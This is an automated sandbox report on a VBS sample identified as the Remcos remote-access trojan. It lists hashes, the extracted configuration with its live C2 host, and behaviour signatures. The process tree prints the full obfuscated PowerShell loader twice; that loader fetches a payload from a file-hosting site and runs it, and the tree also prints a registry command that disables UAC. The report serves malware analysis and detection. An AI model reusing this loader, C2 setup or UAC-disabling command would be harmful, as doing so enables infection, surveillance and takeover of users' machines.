Overview

overview

10

Static

static

1

9fc46e1dec...1f.vbs

windows7-x64

10

9fc46e1dec...1f.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-11-2024 02:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f.vbs

  • Size

    33KB

  • MD5

    25a7df33e8fee89dfef3426080405533

  • SHA1

    3bb1b11f8b041a59a4e8c498c88bbeae17d5f182

  • SHA256

    9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f

  • SHA512

    71fc9d9b64dce6f66941e63567c5eb89f57fb1e9caefbdb9fcd2eb1bb2bde1a98a4b156196b91f47834561a3178bb22665b513edb6b440bf313a39ae63f87b50

  • SSDEEP

    768:AxuasGxaSoM5LC3gWamt6iNi+ehBhZ+2JZ/q367gTeVVh0krL3uS:SuasQo2GZU+ehB/+WIQEmf0k3J

Score
10/10
remcosremotehostdiscoveryevasionrattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

45hq459.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-ZP0CQ6

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fc46e1dec1ebaa57e09e3a3d12cfc8b95653d6f26a754a0596d10b0ba9b3f1f.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2644
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Refrnsangs='Crebrisulcate';;$Kilmarnock='Itonaman';;$Vegetoanimal189='Aurichalcite';;$Flirtable='Abnormalizing134';;$Fdeegn='Epalpate';;$Unestopped=$host.Name;function spiritusbestemmelsers($Toksiologi){If ($Unestopped) {$Laundromat255=4} for ($Giltheads211=$Laundromat255;;$Giltheads211+=5){if(!$Toksiologi[$Giltheads211]) { break }$Vasotripsy+=$Toksiologi[$Giltheads211]}$Vasotripsy}function strimlingernes($Giltheads211sdkkede){ .($Fasanhanen) ($Giltheads211sdkkede)}$Praedialist=spiritusbestemmelsers 'Opvan PorEbonat he .snepwcoxoebeepbRingCOverl Ur iSkadeCellNund T';$Talehrelrernes=spiritusbestemmelsers 'BureM Proo.mpuz PhyiM,sclErytl uneaTe,p/';$Compends=spiritusbestemmelsers 'P rfTCanolIndks ,to1 yde2';$Subornation='Shel[FangNHeare C.mtGr g.UtaksCol,eUddyRSupeV B siAposCKlateNewspau oo SljIOuthnDiomtSpgemDougaSlagNFa rA HasG,esueI serDepo]pleu: Slj:DicesLeakE ProCUranuKoncR S.niIndtT D cyVigepSvinrEmerOElwitMiscOTil.CEncooBuoylNull=Hemi$Udk CBib,obouim trbPIn ie urenMised FriS';$Talehrelrernes+=spiritusbestemmelsers 'Henf5K me.Kons0Con, Acho(WhitW ubsiKildn FledBrueoWithwkartsUnre ForhN PinTCorr le1Scap0 Nge.Bacu0For ;Raad ArrWPa iiMethnbetr6Unhe4Rect;Ranc HetexG.km6Turb4Vulc;Bedr fy,prAff.vWith:Opl.1F lm3Bigg1 le.Hypo0S lf)S in SeptGHar eSynacSenekRo eoMrk / uar2Anti0R ak1Waga0 sla0Unom1 ods0Asym1G,ow Ch yF MiriManvremuleChanfpurho ForxWis,/popu1 Lom3 cla1Lu a.idyl0';$Skraldgasvrkers=spiritusbestemmelsers 'FemkUundisUrt eSikkRCrop- TilaOverGWeirEFle.N.heiT';$Almuernes=spiritusbestemmelsers ' Exah ChotG tet Pa pErotsFang:Myel/ Dio/ fsmdBlemr Fari Pitv ReheAnko.CimbgAnsgoSvu o,ogrg ProlP taeDeni.BoffcMytho OldmOver/ VanuM.rfcChel? laseAlkyxPrevpBioeoUnv rAnestint,=D ald ilhoVidewLovonSvirlForpo HipaLovpdSvib& FreiAnt dgenh= d.f1 T iM Antu,hilkMassvAnsvy RefIPat R.harsS.trK BloqRootMSto,LBr d5zealN ktuwVelrqPi.kEtaurMTrapWSlagxAmbuQ SynE ompK T gCChok9Reciw kuf2 B p- EksjI eatReliqClomF';$etagevaskens=spiritusbestemmelsers 'Udhv>';$Fasanhanen=spiritusbestemmelsers 'TykkiSeedE Hi X';$Preluxurious='Bakkekams';$Matteuccia8='\Skyggeboksningerne.Cha';strimlingernes (spiritusbestemmelsers 'Iodo$KlemG TaklSympoHallbRa iABestlK mi: F,rcHudfa SamtIn.sNGnetA atac StaHFanee Co =F al$ DriEAku,nVelvv.onh:UnfeAUretpMe apBramD WagaFil tProfASev +Kaar$Id.oM LataSkifTFebetHa.me m,tU vdCDiskCBio,I IndAReno8');strimlingernes (spiritusbestemmelsers 'Mot,$ oncg lvel RafoO erbEu yA ZarLColu:Sc,wSadmiE ex rAgure Frsn LotiOmb.TAstrPIncaxIn.e=Saut$gobiAMaltlEvicMF lluHundeE hrr squnZemiEOpsos,utl. ntaSophepIm,rlLensiCalltDalb(Stan$OutsESka,T AntA S rGEuchERixdvWhita redsRaceK MaxER,diNStevSNonc)');strimlingernes (spiritusbestemmelsers $Subornation);$Almuernes=$Serenitpx[0];$Asphyxies=(spiritusbestemmelsers 'Mie $AntiGDukal No oVideB .lya Tr.LInsc: stebKeybaOr fgPolyEG rrpEg,luTakolLa iVHip EBr sRChevENonenMiseEB cu=Cu hNkeele vicwfokk-GrunoForsbtrs.jDybgEClanCVanltKong inteSLabbY.uppS galt O.gE agtmtvrt.Sten$BunipUdsaRN nsaEr.gePetiD.vleiSebaaOpmrL urbiSpilsToroT');strimlingernes ($Asphyxies);strimlingernes (spiritusbestemmelsers ' re$ .reBP anaEx gg WireForbpKirku toslM,ltvDobbeTraprCirke EmbnAmpheIndl.NoodHSpileLograFulldOverePararr fus Fa [Foss$q akSMonokU atrK plaGrupl dvedEngrg Tr.aInfos FarvtinnrKolok T eeBassrPlacsTang] aml=Omkl$Ens TSa oa B wl T ueDomah indrFanie Hesl BonrForbeunririnflnReple naps');$Traumatiseret=spiritusbestemmelsers ' for$ LufB Kroa hiigCau.eBurnpSparuGafnlReasv.rrieKo tr VkseFortn Akve G.n.MiniD ,akoIrr,w Gs nScholE heoAsseaspi d .alFTyraiNonvlConseSpol(Wife$DiscA ,jelRen,m ethu Es eBounrA alnSylvePhrysDama, Lr $ diopForrupayclGedetDefioUrennDat )';$pulton=$Catnache;strimlingernes (spiritusbestemmelsers ' Sto$N,niGVrdiLQuipoFugtbTaarAP.nfLVe,d:AnstLSa saSkremU osICoari StlndiapA SndeBeco= Rin( ForT iviESkifs agt Rhi- FolpSubfaAgnetVos H dic Raf$Af np SjauJam lz motPar.o.edeNSkif)');while (!$lamiinae) {strimlingernes (spiritusbestemmelsers ' arl$PostgmatrlH teoSuffbHel aIndilUltr:Sem O,olovB oreDaggrBub sStv u.ranmForksS,ol=Hipp$ C tFsiv oUndir ordbH rdrIncouIslagbas sPiges,rotk.ermaAnegtRak t omeLip nUdlu1 Dri3Afkr3') ;strimlingernes $Traumatiseret;strimlingernes (spiritusbestemmelsers ' ohoSAnvetLin.aSupeRdishtMeni-Mon.s AshL U,cEBygneReolpKont Coc4');strimlingernes (spiritusbestemmelsers 'Ant $ FriGGooiLHyldoSquibF ckAJernlB.nd:LaseLHoseAhyalm FatiSkari BreNBearAUrenE Pat=Hosp(SinuTSt aeRejns DraT Mas- disPDngeACoastStioH Ind Spor$DrawpUndsu,ndeL MiltAbonoJourNStor)') ;strimlingernes (spiritusbestemmelsers 'Besk$FreeGTo sLSluso oubbSqusaSnupLKa r:Autia F,rl,nogdBreaE RudaH,pe=Chau$FjedgKonflMiniOF ktB OveAMi uLCont:TrotPEastR Toro DrePDeliASatinVipsoBasulAze +Forb+Stra%E fa$HeadS .itESvesrLaboe AltnAveli PasTkunsPBortX T,p.compCBlowOUd euanglNBindt') ;$Almuernes=$Serenitpx[$Aldea]}$Elektromagnet=294112;$oplsende=30959;strimlingernes (spiritusbestemmelsers 'Prei$jon.G R,sLG adoleftBNudnA lanlbind:ArchF Pl oGrisLK.nski obEPlacRS.btI MahGClose ,il pr,p=Serb Draag.ingEstyrTOpfy-MelaCM nio RepNIndktBek.eEnd,N Hert Vej Ane$IndappolyUE.trlTilltPrimODu lN');strimlingernes (spiritusbestemmelsers 'Drag$ AppgNedrlB nkoAntibLerdaAr el Unf: SteItim nSammd .antLachrElenaFuldkti,g Ung=Smaa Dis[ SolSDendy isssRetstP roeFldnmunpe.micrCUnfioTonen Vr.vPrereMillrBreptFa c]Ciro:Gril:citrFHvisrUdkmoRetom CreB Me.aNatbsSupee Eth6Svig4 SeqS Fret owtrHormiTknin ForgUnte(J rd$bedsFSut oN.nplFilmk dleMiljrChi i Ma.g t nehon )');strimlingernes (spiritusbestemmelsers 'fd v$UnobGSyntlAssyOCe hBRefoaRe ul,ryp:Futci creNBristUncor EreoKonddB odUNonec,rest flyOOks,RD ssIPentNDobbEUnpesLettsAgam C r=Inso Cal[LinjsAto,y Snosoutrt ffeeRutimSeni.SnubtVapoEAminx Mu t yd.FilkeFortnIkenC U soEsotDHostiFyriNS iggOprr]T dd:Geob: utaIntes KraCBreviTol i A,o.LeggG.imneb.nkTAttaS S yt SemRMallI HydnVandGOpda(None$ KvaI Ch.NDecid orTKbesRTresaIdeeKFo.t)');strimlingernes (spiritusbestemmelsers ' ov$Samfgn mblP uso StrBS,sqA estLActi: emimP,thO adaREm,eFBer DG avR Ag.EL,gknPredESama=Fork$Sc nISkr NSequTRe,irPle,OU quDKl,bUFortc angtKarto umeRMrkei StenEastEOplgsPrimsKbma.KikksUltrUOphibParusUnretKo,drUd,aiKn.cNHvssGRean( Pro$SigtE DoslTli e FidkDerotIns rCaulOTriamRappaKajpGRealNBehieKontTScia,Slav$PaapoUnytpTaboLge nsDolieFashnBotrDIsvaECce )');strimlingernes $Morfdrene;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3420
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1132
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    507deefc36d0a77e3ddd02b2c766d79e

    SHA1

    273a977f9c1a28b8510ac3fed3c9268db58f97dc

    SHA256

    278efeb871198a9c59ab1e9e08ba4ca5cade5b4d281b2b77e6451ea05cd13942

    SHA512

    27d9f424408f30b0b8d5c582bebbf88045acba0794cf95f9e87d0cfca76c080eef4cfe1738874816da9f8ba495bf11370bb744e611b1d64bdd37b0d8607ba40f

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d4ff23c124ae23955d34ae2a7306099a

    SHA1

    b814e3331a09a27acfcd114d0c8fcb07957940a3

    SHA256

    1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

    SHA512

    f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lmkhgfv5.hpb.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Skyggeboksningerne.Cha
    Filesize

    423KB

    MD5

    c1c6567f2739c2f038cdcb65ebee8a05

    SHA1

    e533d6a51fef763b4765cfc842d6f99e3937176a

    SHA256

    e4e15d42053d9d51a43c89b75aea7bd42a809d0a99535947219c208ff985b0eb

    SHA512

    175c6f4f3c60112c33c5fbeb5705291551edf6a39cab33bb0e48742de1bdb97ecdd2a8a25a39a4dfa4acc402d742a51c278961d966b489388c16480d7f3ebb88

    Download Submit

  • memory/2612-62-0x0000000000800000-0x0000000001A54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/2644-15-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2644-19-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2644-21-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2644-24-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2644-18-0x00007FFBC4243000-0x00007FFBC4245000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2644-16-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2644-10-0x000002544BA40000-0x000002544BA62000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2644-4-0x00007FFBC4243000-0x00007FFBC4245000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3420-28-0x0000000005B40000-0x0000000005BA6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3420-46-0x00000000075B0000-0x00000000075D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3420-29-0x0000000005C20000-0x0000000005C86000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3420-41-0x0000000006370000-0x000000000638E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3420-42-0x00000000063A0000-0x00000000063EC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3420-43-0x0000000007BD0000-0x000000000824A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3420-44-0x0000000006900000-0x000000000691A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3420-39-0x0000000005D40000-0x0000000006094000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3420-45-0x0000000007620000-0x00000000076B6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3420-47-0x0000000008800000-0x0000000008DA4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3420-27-0x0000000005460000-0x0000000005482000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3420-49-0x0000000008DB0000-0x0000000009EE9000-memory.dmp

    Filesize

    17.2MB

    Download

  • memory/3420-26-0x0000000005510000-0x0000000005B38000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3420-25-0x0000000002A30000-0x0000000002A66000-memory.dmp

    Filesize

    216KB

    Download